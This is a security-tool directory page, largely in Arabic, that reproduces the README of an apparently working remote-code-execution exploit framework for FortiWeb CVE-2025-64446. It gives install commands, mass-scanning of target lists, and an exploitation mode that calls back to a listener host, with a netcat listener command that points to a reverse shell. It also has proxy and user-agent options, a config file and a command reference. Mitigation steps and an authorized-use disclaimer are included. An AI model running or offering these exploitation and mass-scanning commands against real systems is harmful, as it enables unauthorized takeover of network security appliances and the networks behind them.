Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
FortiWeb-cve-2025-64446-RCE-exploit — Security research tool for FortiWeb CVE-2025-64446 vulnerability. Automated exploitation framework with advanced logging, real-time metrics, proxy debugging, and professional reporting. Includes retry logic, multi-threading, and configurable settings. For authorized security testing only. CVSS 9.8 Critical. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/fortiweb-cve-2025-64446-rce-exploit
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubcerberusmrxi/fortiweb-cve-2025-64446-rce-exploit

FortiWeb-cve-2025-64446-RCE-exploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

Security research tool for FortiWeb CVE-2025-64446 vulnerability. Automated exploitation framework with advanced logging, real-time metrics, proxy debugging, and professional reporting. Includes retry logic, multi-threading, and configurable settings. For authorized security testing only. CVSS 9.8 Critical.

عرض المستودع
1منذ 21 أياملم تتم المراجعة بعد
مشاركة

استغلال RCE لثغرة CVE-2025-64446 في FortiWeb

Python License CVSS CVE Status Version

إطار عمل احترافي لأبحاث الأمن وتقييم الثغرات

التثبيت · البدء السريع · دليل الاستخدام · البنية · مرجع الأوامر · إخلاء المسؤولية


نظرة عامة

أداة أبحاث FortiWeb هي إطار تقييم مكتوب بلغة Python للكشف والتحليل المصرح به لثغرة CVE-2025-64446، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد قبل المصادقة تؤثر على أجهزة جدار حماية تطبيقات الويب FortiWeb.

الخاصيةالتفاصيل
المؤلفSudeepa Wanigarathna
CVECVE-2025-64446
CVSS9.8 (حرجة)
التصنيفتجاوز المصادقة + اجتياز المسار → رفع ملفات تعسفي → RCE
الإصدارات المتأثرةالإصدارات الأقدم من 7.6.7 / 7.8.7 / 8.0.2 (تحقق من النشرة الرسمية)
المعالجةالترقية إلى إصدار FortiWeb مصحح
اللغةPython 3.7+
نقطة الدخولexploit.py

القدرات الرئيسية


ملخص الثغرة

تحقق دائمًا من الإصدارات المتأثرة/المصححة لدى Fortinet PSIRT قبل تحديد نطاق الاختبار.


📸 لقطات الشاشة

الاستخدامنتائج الفحص
DashboardScan Results

التثبيت

root@kitploit:~
git clone https://github.com/CerberusMrXi/FortiWeb-cve-2025-64446-RCE-exploit
cd FortiWeb-cve-2025-64446-RCE-exploit

python3 -m venv venv
source venv/bin/activate          # Linux / macOS
# venv\Scripts\activate           # Windows

pip install -r requirements.txt
python3 exploit.py --help

التبعيات

الحزمةالدور
,

اختيارية (للتطوير): pytest, black, flake8, mypy, python-dotenv — انظر requirements.txt.


البدء السريع

root@kitploit:~
# Vulnerability check only (recommended first)
python3 exploit.py --target https://192.168.1.100:8443 --detect-only

# Safe / read-only checks
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode

# Mass scanning
python3 exploit.py --targets targets.txt --scan-mode --threads 10

# Authorized exploitation (requires listener host)
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444

ملاحظة: يتطلب وضع الاستغلال --lhost. استخدم --detect-only أو --safe-mode عندما لا تنوي تشغيل السلسلة الكاملة.


دليل الاستخدام

وضع الكشف

root@kitploit:~
python3 exploit.py --target https://192.168.1.100:8443 --detect-only
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --verbose
python3 exploit.py --target https://192.168.1.100:8443 --safe-mode
python3 exploit.py --target https://192.168.1.100:8443 --detect-only --timeout 30

يقيم وضع الكشف إمكانية الوصول، ومؤشرات الإصدار، وتعرض الواجهات البرمجية، ومؤشرات اجتياز المسار، وإشارات تجاوز المصادقة، وإمكانية الوصول إلى نقطة رفع الملفات. يُصنف الخطر على أنه حرج / مرتفع / متوسط / منخفض بناءً على تلك المؤشرات.

المسح الشامل

root@kitploit:~
cat > targets.txt << 'EOF'
https://192.168.1.100:8443
https://192.168.1.101:8443
https://192.168.1.102:8443
EOF

python3 exploit.py --targets targets.txt --scan-mode
python3 exploit.py --targets targets.txt --scan-mode --threads 20 --verbose
python3 exploit.py --targets targets.txt --scan-mode --output-dir ./reports

يشغّل ScannerManager عمال FortiWebScanner عبر تجمع خيوط، ويطبع جدولًا موجزًا بتقنية Rich، ويكتب scan_report.json / scan_report.html.

وضع الاستغلال (المختبرات المصرح بها فقط)

root@kitploit:~
# Start your listener first (example)
nc -lvnp 4444

python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --proxy http://127.0.0.1:8080
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --dry-run
python3 exploit.py --target https://192.168.1.100:8443 --lhost 192.168.1.50 --lport 4444 --user-agent "Research/1.0"

ملف الإعدادات

root@kitploit:~
# config.yaml
target: https://192.168.1.100:8443
lhost: 192.168.1.50
lport: 4444
timeout: 15
threads: 5
verify_ssl: false
verbose: true
proxy: http://127.0.0.1:8080
user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
output_dir: reports
log_dir: logs
detect_only: false
safe_mode: false
dry_run: false
root@kitploit:~
python3 exploit.py --config config.yaml
python3 exploit.py --config config.yaml --target https://10.0.0.1:8443 --lport 9999

تتجاوز وسائط CLI القيم المحمّلة من YAML.


البنية

root@kitploit:~
exploit.py
├── ExploitConfig / ExploitResult / RequestMetrics   # dataclasses
├── LogManager                                       # exploit.log, errors.log, requests.log
├── Banner / StatusDisplay                           # Rich / colorama UI
├── FortiWebScanner                                  # detect-only checks (no exploit chain)
├── ScannerManager                                   # threaded multi-target scans + reports
├── FortiWebExploit                                  # single-target detect / exploit workflow
└── main()                                           # argparse + mode dispatch
المكوّنالمسؤولية
FortiWebScannerفحوصات إمكانية الوصول والإصدار ومؤشرات CVE

التدفق العام لهدف واحد:

  1. إعداد الشعار / التسجيل
  2. فحص إمكانية الوصول والإصدار
  3. فحوصات المؤشرات (أو السلسلة الكاملة عندما لا يكون وضع الكشف/الآمن مفعّلًا)
  4. تقرير JSON + HTML داخل reports/
  5. التنظيف عند الاقتضاء

الميزات

الكشف

  • فحوصات مؤشرات اجتياز المسار ضد مسارات واجهة الإدارة البرمجية
  • فحوصات إشارات تجاوز المصادقة
  • فحص إصدار FortiWeb عبر نقاط الحالة/الإصدار الشائعة
  • رسم خريطة تعرض نقاط الواجهة البرمجية
  • فحوصات إمكانية الوصول إلى نقطة رفع الملفات
  • تقييم الخطر من المؤشرات المجمعة

التقارير والمراقبة

  • تقارير JSON وHTML بطوابع زمنية
  • مقاييس لكل طلب (الحالة، زمن الاستجابة، معدل النجاح)
  • سجلات منفصلة: exploit.log, errors.log, requests.log

عناصر التحكم التشغيلية

  • مسح شامل متعدد الخيوط (--threads)
  • دعم وكيل HTTP/HTTPS (مثل Burp)
  • إعادة محاولة مع عدد محاولات/تأخير قابلين للتكوين (الافتراضي: 3 / ثانيتان)
  • User-Agent مخصص، ومهلة زمنية، وتبديل التحقق من SSL (--no-verify)
  • مخرجات وحدة تحكم ملونة عبر Colorama + Rich

المخرجات المُولَّدة

root@kitploit:~
reports/
├── report_YYYYMMDD_HHMMSS.json
├── report_YYYYMMDD_HHMMSS.html
├── scan_report.json
└── scan_report.html

logs/
├── exploit.log
├── errors.log
└── requests.log

نموذج تقرير JSON (كشف)

root@kitploit:~
{
  "metadata": {
    "tool_name": "FortiWeb Research Tool",
    "version": "1.0",
    "author": "Sudeepa Wanigarathna",
    "timestamp": "2026-07-31T00:02:17",
    "mode": "detect"
  },
  "target": {
    "url": "https://192.168.1.100:8443",
    "reachable": true,
    "version": "7.6.0",
    "vulnerable": true,
    "risk_level": "Critical"
  },
  "metrics": {
    "total_requests": 12,
    "average_response_time": 0.42,
    "success_rate": 0.91
  }
}

مرجع الأوامر

root@kitploit:~
python3 exploit.py [OPTIONS]

هيكل المشروع

root@kitploit:~
.
├── exploit.py           # Research tool (detect / scan / exploit)
├── config.yaml          # Example configuration
├── requirements.txt     # Python dependencies
├── reports/             # Generated JSON / HTML reports
├── logs/                # Runtime logs
├── LICENSE
├── SECURITY.md
├── .gitignore
└── README.md

إرشادات التخفيف

  1. قم بترقية FortiWeb إلى إصدار مصحح (7.6.7+ أو 7.8.7+ أو 8.0.2+ أو وفق إرشادات PSIRT الحالية).
  2. قيّد واجهات الإدارة على الشبكات الموثوقة / المضيفات الوسيطة.
  3. راقب نشاط واجهات المصادقة والصيانة البرمجية بحثًا عن وصول شاذ.
  4. غيّر بيانات الاعتماد وراجع السلامة بعد أي تعرض مؤكد.
  5. أعد تشغيل --detect-only / --safe-mode بعد الترقية للتحقق من فعالية المعالجة.

إخلاء المسؤولية القانوني والأخلاقي

هذه الأداة مخصصة فقط لاختبارات الأمان المصرح بها والأبحاث والتعليم.

  • استخدمها فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • اتبع قواعد الإفصاح المسؤول وبرامج مكافآت اكتشاف الثغرات
  • لا تستخدمها للوصول غير المصرح به أو إلحاق الضرر أو النشاط غير القانوني

باستخدامك لهذا البرنامج، فأنت تؤكد أن لديك التفويض، ولن تسيء استخدامه، وتتحمل المسؤولية الكاملة عن أفعالك. المؤلف غير مسؤول عن سوء الاستخدام.

انظر SECURITY.md للإبلاغ الخاص بالثغرات المتعلقة بهذا المشروع.


الموارد

  • Fortinet PSIRT
  • النشرة: FG-IR-25-64446
  • تنزيل التصحيحات
  • NVD: CVE-2025-64446

المساهمة

  1. اعمل Fork للمستودع
  2. أنشئ فرعًا: git checkout -b feature/your-change
  3. نفّذ Commit برسالة واضحة
  4. ارفع التغييرات وافتح طلب سحب (Pull Request)

يرجى التحقق من التغييرات فقط في بيئات مختبرات مصرح بها وتجنب إجراء Commit لبيانات أهداف مباشرة أو ملفات تعريف الارتباط أو بيانات الاعتماد.


الترخيص

رخصة MIT — انظر LICENSE.

حقوق النشر (c) 2026 Sudeepa Wanigarathna


المؤلف والدعم

المؤلفSudeepa Wanigarathna
المشكلاتGitHub Issues لهذا المستودع
الأمانانظر SECURITY.md ·

أبحاث مصرح بها فقط · FortiWeb CVE-2025-64446

العودة إلى الأعلى

تنزيل الأداة
الوضعالخياراتالغرض
الكشف--detect-onlyمؤشرات الثغرة دون استغلال
الوضع الآمن / للقراءة فقط--safe-modeتخطي خطوات الاستغلال المعدِّلة
المسح الشامل--targets + --scan-modeتقييم متوازٍ لأهداف متعددة
الاستغلال--target + --lhostسلسلة استغلال مُتحكم بها في مختبرات مصرح بها فقط
التشغيل التجريبي--dry-runاختبار التدفق دون تطبيق التغييرات
التقارير--output-dirتقارير JSON + HTML للاختبار
الحقلالقيمة
معرّف CVECVE-2025-64446
درجة CVSS9.8 (حرجة)
الأثراختراق كامل للنظام عند نجاح الاستغلال
الإصلاحالترقية إلى 7.6.7 أو 7.8.7 أو 8.0.2 أو أحدث
مخرجات HTML
Terminal Output
requests
urllib3
عميل HTTP
rich, colorama, tqdmواجهة الطرفية وعرض التقدم
pyyamlتحميل config.yaml
ScannerManager
مسوحات متوازية، وتجميع JSON/HTML، وجدول موجز
FortiWebExploitجلسة مدفوعة بالإعدادات، وإعادة محاولة، ومقاييس، وتقارير، ومسار استغلال اختياري
LogManagerتسجيل ملفات منظم + وحدة تحكم ملونة
الخيارالوصف
--target URLعنوان URL أساسي واحد لـ FortiWeb
--targets FILEقائمة أهداف مفصولة بأسطر جديدة
--lhost IPمضيف المستمع (مطلوب للاستغلال)
--lport PORTمنفذ المستمع (الافتراضي: 4444)
--config FILEإعدادات YAML
--detect-onlyالكشف فقط؛ تجاوز سلسلة الاستغلال
--scan-modeمسح متعدد الأهداف (يتطلب --targets)
--safe-modeللقراءة فقط؛ تخطي الخطوات المعدِّلة
--dry-runتشغيل تجريبي دون تطبيق التغييرات
--timeout SECمهلة الطلب (الافتراضي: 15)
--threads Nعدد عمال الفحص (الافتراضي: 5)
--proxy URLوكيل HTTP
--user-agent STRUser-Agent مخصص
-v, --verboseتسجيل / وحدة تحكم مفصّلة
--no-verifyتعطيل التحقق من شهادة TLS
--output-dir DIRدليل التقارير (الافتراضي: reports)
--log-dir DIRدليل السجلات (الافتراضي: logs)
-h, --helpعرض المساعدة
[email protected]